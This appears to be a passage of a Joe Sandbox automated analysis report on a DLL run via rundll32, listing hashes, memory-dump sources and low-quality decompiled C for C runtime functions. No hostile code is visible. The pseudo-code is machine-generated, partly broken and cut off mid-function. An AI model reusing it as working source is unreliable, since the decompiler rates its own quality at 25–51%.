                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB65A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                • String ID: ?
                • API String ID: 500310315-1684325040
                • Opcode ID: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction ID: 4a97054d569c4b0cdfeb428315169a85bf3cda63ebc154d09537f472f6eee79c
                • Opcode Fuzzy Hash: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction Fuzzy Hash: 2461C37292CF428AE750DF20E9401B9776AFFC6794F48A136EA0E52A94DF3CE445D740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E00007FFA7FFA535EC0AC(void* __eax, char __ecx, void* __rcx, void* __rdx, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				char _v56;
                				void* __rbx;
                				void* _t32;
                				void* _t37;
                				long long _t47;
                				void* _t48;
                				void* _t55;
                				void* _t56;
                				void* _t57;
                
                				asm("movsd [esp+0x20], xmm3");
                				asm("movsd [esp+0x18], xmm2");
                				_push(_t48);
                				_t57 = _t56 - 0x50;
                				r8d = 0;
                				if ( *0x53671ce0 == _t37) goto 0x535ec0e7;
                				r8d = r8d + 1;
                				if (0x7ffa53671cf0 - 0x53671eb0 < 0) goto 0x535ec0cc;
                				goto 0x535ec0f2;
                				_t47 =  *((intOrPtr*)(0x53671ce0 + 8 + (r8d + r8d) * 8));
                				 *((long long*)(_t57 + 0x28)) = _t47;
                				if (_t47 == 0) goto 0x535ec165;
                				_v40 =  *((intOrPtr*)(_t57 + 0x70));
                				_v36 = _a28;
                				_v32 = _a32;
                				_v28 = _a36;
                				_v24 = _a40;
                				_v20 = _a44;
                				_v56 = __ecx;
                				E00007FFA7FFA535EC1A0(__ecx, _t47, _t48, _a48, __rdx, _t55);
                				_t53 =  &_v56;
                				if (E00007FFA7FFA535EF8B8(_t48,  &_v56) != 0) goto 0x535ec15d;
                				E00007FFA7FFA535EC07C( &_v56);
                				asm("movsd xmm0, [esp+0x40]");
                				goto 0x535ec17a;
                				E00007FFA7FFA535EC1A0(__ecx, _t47, _t48,  &_v56, __rdx, _t55);
                				_t32 = E00007FFA7FFA535EC07C(_t53);
                				asm("movsd xmm0, [esp+0x80]");
                				return _t32;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_set_errno_from_matherr
                • String ID: exp
                • API String ID: 4230380726-113136155
                • Opcode ID: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction ID: 7f92bde535e805f478016e6247d36e16d9f3180c8d1306ddfc0597af4ff2a88e
                • Opcode Fuzzy Hash: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction Fuzzy Hash: DC21FC36A28B85CBE764DF28E44066A73A5FFCA740F54A135F68E92B55DE3CD4409F00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction ID: 4179510b56d69c6193ada976ec2268c1f94c609e12c43dd7f7d25d74ae170532
                • Opcode Fuzzy Hash: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction Fuzzy Hash: 6DF04F61A39F4285EF449B61F4842792366EFCA790F4CA43AD94F96664DE3CD488C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 28%
                			E00007FFA7FFA535F37AC(signed int __ebx, void* __ecx, signed int __esi, void* __fp0, intOrPtr* __rcx, long long __rdx, intOrPtr* __r9) {
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t57;
                				void* _t58;
                				int _t65;
                				int _t69;
                				intOrPtr _t81;
                				intOrPtr _t82;
                				signed long long _t153;
                				intOrPtr* _t156;
                				intOrPtr* _t158;
                				signed long long _t159;
                				intOrPtr* _t172;
                				signed long long _t179;
                				signed long long _t180;
                				signed long long _t181;
                				signed long long _t182;
                				intOrPtr* _t198;
                				signed long long _t203;
                				void* _t204;
                				void* _t205;
                				void* _t206;
                				void* _t207;
                				void* _t214;
                				void* _t218;
                				void* _t219;
                				long long _t220;
                				intOrPtr* _t222;
                
                				_t205 = _t204 - 0x88;
                				_t203 = _t205 + 0x50;
                				_t153 =  *0x53754140; // 0x9bd95a2971b4
                				 *(_t203 + 0x28) = _t153 ^ _t203;
                				r12d = 0;
                				_t222 =  *((intOrPtr*)(_t203 + 0xa8));
                				 *_t203 = r8d;
                				 *((long long*)(_t203 + 8)) = __rdx;
                				if (__ebx <= 0) goto 0x535f381f;
                				_t58 = E00007FFA7FFA535F3620(_t57, __r9,  *((intOrPtr*)(_t203 + 0xa0)));
                				if (__esi <= 0) goto 0x535f382b;
                				E00007FFA7FFA535F3620(_t58, _t222,  *((intOrPtr*)(_t203 + 0xb0)));
                				goto 0x535f3830;
                				if (__ebx - 0xffffffff >= 0) goto 0x535f3804;
                				goto 0x535f3b21;
                				if (__esi - 0xffffffff < 0) goto 0x535f3824;
                				r14d =  *((intOrPtr*)(_t203 + 0xb8));
                				if (r14d != 0) goto 0x535f3843;
                				r14d =  *((intOrPtr*)( *__rcx + 0xc));
                				if (__ebx == 0) goto 0x535f3854;
                				if (__esi != 0) goto 0x535f38ef;
                				if (__ebx != __esi) goto 0x535f3862;
                				goto 0x535f3b21;
                				if (__esi - 1 <= 0) goto 0x535f386d;
                				goto 0x535f3b21;
                				if (__ebx - 1 <= 0) goto 0x535f387b;
                				goto 0x535f3b21;
                				if (GetCPInfo(??, ??) == 0) goto 0x535f3824;
                				if (__ebx <= 0) goto 0x535f38bb;
                				if ( *((intOrPtr*)(_t203 + 0x10)) - 2 < 0) goto 0x535f3871;
                				_t156 = _t203 + 0x16;
                				if ( *((intOrPtr*)(_t203 + 0x16)) == r12b) goto 0x535f3871;
                				if ( *((intOrPtr*)(_t156 + 1)) == r12b) goto 0x535f3871;
                				_t81 =  *__r9;
                				if (_t81 -  *_t156 < 0) goto 0x535f38b2;
                				if (_t81 -  *((intOrPtr*)(_t156 + 1)) <= 0) goto 0x535f3858;
                				goto 0x535f389e;
                				if (__esi <= 0) goto 0x535f38ef;
                				if ( *((intOrPtr*)(_t203 + 0x10)) - 2 < 0) goto 0x535f3866;
                				_t158 = _t203 + 0x16;
                				if ( *((intOrPtr*)(_t203 + 0x16)) == r12b) goto 0x535f3866;
                				if ( *((intOrPtr*)(_t158 + 1)) == r12b) goto 0x535f3866;
                				_t82 =  *_t222;
                				if (_t82 -  *_t158 < 0) goto 0x535f38e6;
                				if (_t82 -  *((intOrPtr*)(_t158 + 1)) <= 0) goto 0x535f3858;
                				_t159 = _t158 + 2;
                				goto 0x535f38cd;
                				 *(_t205 + 0x28) = r12d;
                				r9d = __ebx;
                				 *((long long*)(_t205 + 0x20)) = _t220;
                				_t65 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t65 == 0) goto 0x535f3824;
                				_t195 = _t65 + _t65;
                				_t22 = _t195 + 0x10; // 0x10
                				asm("dec eax");
                				if ((_t22 & _t159) == 0) goto 0x535f39a9;
                				_t25 = _t195 + 0x10; // 0x10
                				_t179 = _t25;
                				asm("dec eax");
                				_t26 = _t195 + 0x10; // 0x10
                				if ((_t159 & _t179) - 0x400 > 0) goto 0x535f3987;
                				asm("dec eax");
                				_t180 = _t179 & _t26;
                				_t27 = _t180 + 0xf; // 0x1f
                				if (_t27 - _t180 > 0) goto 0x535f3965;
                				E00007FFA7FFA535F54B0(r14d, 0xffffffffffffff0, _t180, _t65 + _t65, 0xfffffff0, _t218, _t219);
                				_t206 = _t205 - 0xfffffff0;
                				_t198 = _t206 + 0x50;
                				if (_t198 == 0) goto 0x535f3b07;
                				 *_t198 = 0xcccc;
                				goto 0x535f39a3;
                				asm("dec eax");
                				_t181 = _t180 & 0xffffffffffffff0;
                				E00007FFA7FFA535E7E98(_t181);
                				if (0xffffffffffffff0 == 0) goto 0x535f39ab;
                				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
                				goto 0x535f39ab;
                				if (0x1000000000000000 == 0) goto 0x535f3b07;
                				 *(_t206 + 0x28) = r12d;
                				r9d = __ebx;
                				 *(_t206 + 0x20) = 0x1000000000000000;
                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) goto 0x535f3b07;
                				 *(_t206 + 0x28) =  *(_t206 + 0x28) & 0x00000000;
                				r9d = __esi;
                				 *(_t206 + 0x20) =  *(_t206 + 0x20) & 0x00000000;
                				_t69 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t69 == 0) goto 0x535f3b07;
                				_t214 = _t69 + _t69;
                				asm("dec eax");
                				if ((_t214 + 0x00000010 & _t181) == 0) goto 0x535f3a92;
                				_t182 = _t214 + 0x10;
                				asm("dec eax");
                				if ((0xffffffffffffff0 & _t182) - 0x400 > 0) goto 0x535f3a70;
                				asm("dec eax");
                				if ((_t182 & _t214 + 0x00000010) + 0xf - (_t182 & _t214 + 0x00000010) > 0) goto 0x535f3a4e;
                				E00007FFA7FFA535F54B0(r14d, 0xffffffffffffff0, _t182 & _t214 + 0x00000010, _t214 + 0x10, _t214, _t218, _t219);
                				_t207 = _t206 - 0xfffffff0;
                				_t172 = _t207 + 0x50;
                				if (_t172 == 0) goto 0x535f3aed;
                				 *_t172 = 0xcccc;
                				goto 0x535f3a8c;
                				asm("dec eax");
                				E00007FFA7FFA535E7E98(_t182 & _t214 + 0x00000010 & 0xffffffffffffff0);
                				if (0xffffffffffffff0 == 0) goto 0x535f3a94;
                				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
                				goto 0x535f3a94;
                				if (0x1000000000000000 == 0) goto 0x535f3aed;
                				 *((intOrPtr*)(_t207 + 0x28)) = r15d;
                				r9d = __esi;
                				 *((long long*)(_t207 + 0x20)) = 0x1000000000000000;
                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) goto 0x535f3aed;
                				 *(_t207 + 0x40) =  *(_t207 + 0x40) & 0x00000000;
                				r9d = r12d;
                				 *(_t207 + 0x38) =  *(_t207 + 0x38) & 0x00000000;
                				 *(_t207 + 0x30) =  *(_t207 + 0x30) & 0x00000000;
                				 *((intOrPtr*)(_t207 + 0x28)) = r15d;
                				 *((long long*)(_t207 + 0x20)) = 0x1000000000000000;
                				E00007FFA7FFA535ED8B8(_t72, __fp0, 0x1000000000000000,  *((intOrPtr*)(_t203 + 8)), _t214 + 0x10, 0x1000000000000000, _t153 ^ _t203, _t203, 0x1000000000000000);
                				goto 0x535f3aef;
                				if (0x1000000000000000 == 0) goto 0x535f3b09;
                				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x535f3b09;
                				E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xffffffffffffff0);
                				goto 0x535f3b09;
                				if (0x1000000000000000 == 0) goto 0x535f3b1f;
                				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x535f3b1f;
                				E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xffffffffffffff0);
                				E00007FFA7FFA535F51E0();
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction ID: 972d0482d3329e393c88d519c077d3490ce639df4d23031a2b85a65582a6c7b7
                • Opcode Fuzzy Hash: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction Fuzzy Hash: B5A1D5A2B29B824DFB218BA1945037D669BAF82BA4F4C9631DB5D277C5DF3CE444C300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00007FFA7FFA535F4378(signed int __ecx, void* __edi, void* __esi, void* __ebp, void* __fp0, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                				void* _v64;
                				signed long long _v72;
                				intOrPtr _v84;
                				unsigned int _v88;
                				intOrPtr _v96;
                				long long _v100;
                				signed int _v104;
                				signed int _v120;
                				void* __rsi;
                				void* __rbp;
                				void* _t75;
                				void* _t88;
                				void* _t89;
                				long _t94;
                				unsigned int _t95;
                				intOrPtr _t103;
                				signed int _t124;
                				void* _t127;
                				intOrPtr* _t156;
                				intOrPtr _t159;
                				unsigned long long _t165;
                				signed int* _t167;
                				intOrPtr _t170;
                				signed short* _t180;
                				unsigned int _t183;
                				signed short* _t184;
                				void* _t186;
                				void* _t189;
                				void* _t197;
                				signed long long _t199;
                				signed long long _t200;
                				signed long long _t202;
                				void* _t203;
                				signed short* _t204;
                
                				_t180 = __rdx;
                				_t168 = __rbx;
                				_t127 = __ebp;
                				_a32 = __rbx;
                				r15d = r8d;
                				_t184 = __rdx;
                				if (r8d != 0) goto 0x535f43a6;
                				goto 0x535f4641;
                				if (__rdx != 0) goto 0x535f43ca;
                				E00007FFA7FFA535E8360(_t156);
                				 *_t156 = 0;
                				_t75 = E00007FFA7FFA535E8380(_t156);
                				 *_t156 = 0x16;
                				E00007FFA7FFA535E8260(_t75);
                				goto 0x535f4641;
                				r14d = r14d & 0x0000003f;
                				_t199 = __ecx >> 6;
                				_t202 = __ecx << 6;
                				_v72 = _t199;
                				_t170 =  *((intOrPtr*)(0x53754e50 + _t199 * 8));
                				_t103 =  *((intOrPtr*)(_t170 + _t202 + 0x39));
                				if (__rbx - 1 - 1 > 0) goto 0x535f4400;
                				if (( !r15d & 0x00000001) == 0) goto 0x535f43ab;
                				if (( *(_t170 + _t202 + 0x38) & 0x00000020) == 0) goto 0x535f4416;
                				_t14 = _t180 + 2; // 0x2
                				r8d = _t14;
                				E00007FFA7FFA535F4CA8(0, 0x53754e50, __rbx, _t170, _t180, _t184, _t189);
                				_v88 = _t183;
                				if (E00007FFA7FFA535E4A88(r12d, 0x53754e50, _t170) == 0) goto 0x535f452b;
                				_t159 =  *((intOrPtr*)(0x53754e50 + _t199 * 8));
                				if (( *(0x53754e50 + _t202 + 0x38) & 0x00000080) == 0) goto 0x535f452b;
                				E00007FFA7FFA535E8A30(r12d, __fp0, _t159, _t168, __r9);
                				if ( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x90)) + 0x138)) != _t183) goto 0x535f446c;
                				if ( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t199 * 8)) + _t202 + 0x39)) == dil) goto 0x535f452b;
                				if (GetConsoleMode(??, ??) == 0) goto 0x535f452b;
                				if (_t103 == 0) goto 0x535f450d;
                				if (_t103 - 1 - 1 > 0) goto 0x535f45c8;
                				_v104 = _v104 & 0;
                				_t197 = _t184 + _t203;
                				_t204 = _t184;
                				_v100 = 0;
                				if (_t184 - _t197 >= 0) goto 0x535f45be;
                				r13d =  *_t204 & 0x0000ffff;
                				if (E00007FFA7FFA535F4DA0(r13w & 0xffffffff, _t186) != r13w) goto 0x535f44fb;
                				_v100 = 2;
                				if (r13w != 0xa) goto 0x535f44f0;
                				r13d = 0xd;
                				if (E00007FFA7FFA535F4DA0(r13d, _t186) != r13w) goto 0x535f44fb;
                				_v100 = 2;
                				if ( &(_t204[1]) - _t197 >= 0) goto 0x535f4504;
                				goto 0x535f44b5;
                				_v104 = GetLastError();
                				_t200 = _v72;
                				goto 0x535f45be;
                				r9d = r15d;
                				_t88 = E00007FFA7FFA535F3CEC(r12d, __fp0, _t168,  &_v104, _t184, __r9);
                				asm("movsd xmm0, [eax]");
                				_t124 =  *0x7FFA53754E58;
                				goto 0x535f45c3;
                				if (( *( *((intOrPtr*)(0x53754e50 + _t200 * 8)) + _t202 + 0x38) & 0x00000080) == 0) goto 0x535f458b;
                				if (3 == 0) goto 0x535f4577;
                				if (3 == 0) goto 0x535f4563;
                				if (2 != 1) goto 0x535f45c8;
                				r9d = r15d;
                				_t89 = E00007FFA7FFA535F3FFC(_t88, 3, 2, r12d, _t168,  &_v104, _t186, _t184);
                				goto 0x535f451f;
                				r9d = r15d;
                				E00007FFA7FFA535F4118(_t89, 2, r12d, __esi, _t127, _t168,  &_v104, _t186, _t184);
                				goto 0x535f451f;
                				r9d = r15d;
                				E00007FFA7FFA535F3EF4(2, r12d, _t124, _t168,  &_v104, _t186, _t184);
                				goto 0x535f451f;
                				_v104 = _v104 & _t124;
                				_v120 = _v120 & 0x53754e50;
                				r8d = r15d;
                				_v100 = 0x53754e50;
                				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x535f45bb;
                				_t94 = GetLastError();
                				_v104 = _t94;
                				asm("movsd xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x20], xmm0");
                				_t165 = _v88 >> 0x20;
                				if (_t94 != 0) goto 0x535f463c;
                				_t95 = _v88;
                				if (_t95 == 0) goto 0x535f4608;
                				if (_t95 != 5) goto 0x535f45fb;
                				E00007FFA7FFA535E8380(_t165);
                				 *_t165 = 9;
                				E00007FFA7FFA535E8360(_t165);
                				 *_t165 = 5;
                				goto 0x535f43c2;
                				E00007FFA7FFA535E8310(_t165, _t168,  *((intOrPtr*)( &_v104 + _t202 + 0x28)));
                				goto 0x535f43c2;
                				_t167 =  *((intOrPtr*)(0x53754e50 + _t200 * 8));
                				if (( *(0x53754e50 + _t202 + 0x38) & 0x00000040) == 0) goto 0x535f4624;
                				if ( *_t184 == 0x1a) goto 0x535f439f;
                				E00007FFA7FFA535E8380(_t167);
                				 *0x53754e50 = 0x1c;
                				E00007FFA7FFA535E8360(_t167);
                				 *_t167 =  *_t167 & 0x00000000;
                				goto 0x535f43c2;
                				return _v84 - _v96;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction ID: e79e2f86366f569ae94da9adcb03faac9333a13f018f85a3e66852ab38498644
                • Opcode Fuzzy Hash: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction Fuzzy Hash: 028192E2E38F124DF712AB65D4406BD26AABBC6B54F48A135DE0E23695CF3CE465C310
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E00007FFA7FFA535EBAB0(signed int __ecx, void* __rax, long long __rbx, signed long long __rcx, void* __rdx, signed int __r8) {
                				signed short _t34;
                				unsigned int _t37;
                				unsigned int _t38;
                				void* _t55;
                				unsigned int _t56;
                				void* _t59;
                				void* _t64;
                				signed int _t70;
                				signed int _t71;
                				void* _t74;
                				signed int _t75;
                				void* _t76;
                				signed int _t80;
                				signed int _t83;
                				signed long long _t88;
                				signed long long _t93;
                				void* _t105;
                				void* _t106;
                				void* _t111;
                				void* _t113;
                				void* _t115;
                
                				_t93 = __rcx;
                				 *((long long*)(_t105 + 0x10)) = __rbx;
                				_t106 = _t105 - 0x30;
                				r14d = 0;
                				asm("movaps [esp+0x20], xmm6");
                				r12d = __ecx;
                				_t2 = _t113 + 0x10; // 0x10
                				r13d = _t2;
                				if ((__ecx & 0x00000008) == 0) goto 0x535ebaf9;
                				if (r15b >= 0) goto 0x535ebaf9;
                				E00007FFA7FFA535EC21C(__rax, __rcx);
                				goto 0x535ebcd9;
                				_t70 = 0x00000004 & r12b;
                				if (_t70 == 0) goto 0x535ebb17;
                				asm("dec ecx");
                				if (_t70 >= 0) goto 0x535ebb17;
                				E00007FFA7FFA535EC21C(__rax, _t93);
                				goto 0x535ebcd9;
                				_t71 = dil & r12b;
                				if (_t71 == 0) goto 0x535ebbd5;
                				asm("dec ecx");
                				if (_t71 >= 0) goto 0x535ebbd5;
                				E00007FFA7FFA535EC21C(__rax, _t93);
                				_t88 = __r8 & _t93;
                				if (_t71 == 0) goto 0x535ebba2;
                				if (_t88 == 0x2000) goto 0x535ebb8a;
                				if (_t88 == 0x4000) goto 0x535ebb72;
                				_t74 = _t88 - _t93;
                				if (_t74 != 0) goto 0x535ebbcd;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x8605a]");
                				asm("movsd xmm0, [0x867f2]");
                				if (_t74 > 0) goto 0x535ebbc9;
                				goto 0x535ebbc2;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x86042]");
                				if (_t74 > 0) goto 0x535ebbb0;
                				asm("movsd xmm0, [0x867d8]");
                				goto 0x535ebbc2;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x8602a]");
                				if (_t74 <= 0) goto 0x535ebbba;
                				asm("movsd xmm0, [0x867c0]");
                				goto 0x535ebbc9;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x86012]");
                				if (_t74 <= 0) goto 0x535ebbba;
                				asm("movsd xmm0, [0x86798]");
                				goto 0x535ebbc9;
                				asm("movsd xmm0, [0x8678e]");
                				asm("xorps xmm0, [0x85597]");
                				asm("movsd [esi], xmm0");
                				goto 0x535ebcd9;
                				_t75 = r12b & 0x00000002;
                				if (_t75 == 0) goto 0x535ebcd9;
                				asm("dec ecx");
                				if (_t75 >= 0) goto 0x535ebcd9;
                				asm("movsd xmm0, [edx]");
                				asm("xorps xmm6, xmm6");
                				_t64 =  !=  ? 1 : r14d;
                				asm("ucomisd xmm0, xmm6");
                				if (_t75 != 0) goto 0x535ebc0c;
                				if (_t75 != 0) goto 0x535ebc0c;
                				goto 0x535ebcca;
                				_t34 = E00007FFA7FFA535ED340(r12b & r13b, 0x6000, _t59, _t75, _t106 + 0x70, _t115, _t113, _t111);
                				_t55 =  *((intOrPtr*)(_t106 + 0x70)) + 0xfffffa00;
                				asm("movsd [esp+0x88], xmm0");
                				_t76 = _t55 - 0xfffffbce;
                				if (_t76 >= 0) goto 0x535ebc3c;
                				asm("mulsd xmm0, xmm6");
                				goto 0x535ebcc6;
                				r8d = r14d;
                				asm("comisd xmm6, xmm0");
                				r8b = _t76 > 0;
                				 *(_t106 + 0x8e) = _t34 & 0x0000000f | r13w;
                				if (_t55 - 0xfffffc03 >= 0) goto 0x535ebcb1;
                				_t37 =  *(_t106 + 0x88);
                				_t56 =  *(_t106 + 0x8c);
                				if ((dil & _t37) == 0) goto 0x535ebc8a;
                				_t67 =  ==  ? 1 : 1;
                				_t38 = _t37 >> 1;
                				 *(_t106 + 0x88) = _t38;
                				_t80 = dil & _t56;
                				if (_t80 == 0) goto 0x535ebca3;
                				asm("bts eax, 0x1f");
                				 *(_t106 + 0x88) = _t38;
                				if (_t80 != 0) goto 0x535ebc80;
                				 *(_t106 + 0x8c) = _t56 >> 1;
                				asm("movsd xmm0, [esp+0x88]");
                				if (r8d == 0) goto 0x535ebcc6;
                				asm("xorps xmm0, [0x8549a]");
                				asm("movsd [esi], xmm0");
                				_t82 =  ==  ? 1 : 1;
                				if (( ==  ? 1 : 1) == 0) goto 0x535ebcd6;
                				E00007FFA7FFA535EC21C( *(_t106 + 0x88) >> 0x30, _t111);
                				_t83 = r13b & r12b;
                				if (_t83 == 0) goto 0x535ebcf2;
                				asm("dec ecx");
                				if (_t83 >= 0) goto 0x535ebcf2;
                				E00007FFA7FFA535EC21C( *(_t106 + 0x88) >> 0x30, _t111);
                				asm("movaps xmm6, [esp+0x20]");
                				r14b = (__ecx & 0) == 0;
                				return r14d;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction ID: ddc47afb5f21660ea1829566c097fa29323be1bd51b716aa6a85a46be5e7c1d3
                • Opcode Fuzzy Hash: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction Fuzzy Hash: E551D926D2CF5A49F2229F34A45037A626BBFC2351F0CD275DA5E365D4EF3CA445A600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 25%
                			E00007FFA7FFA535F3CEC(signed int __edx, void* __fp0, long long __rbx, signed long long __rcx, long long __r8, void* __r9, long long _a8) {
                				signed long long _v72;
                				char _v80;
                				intOrPtr _v87;
                				char _v88;
                				long long _v96;
                				long long _v104;
                				int _v108;
                				intOrPtr _v112;
                				short _v116;
                				char _v120;
                				signed long long _v128;
                				signed long long _v136;
                				intOrPtr _v144;
                				signed int _v152;
                				int _t80;
                				long _t85;
                				signed char _t86;
                				void* _t99;
                				signed long long _t117;
                				long* _t126;
                				signed long long _t128;
                				void* _t136;
                				intOrPtr _t137;
                				signed long long _t141;
                				void* _t144;
                				signed long long _t147;
                				void* _t149;
                				void* _t157;
                				void* _t158;
                				signed long long _t162;
                
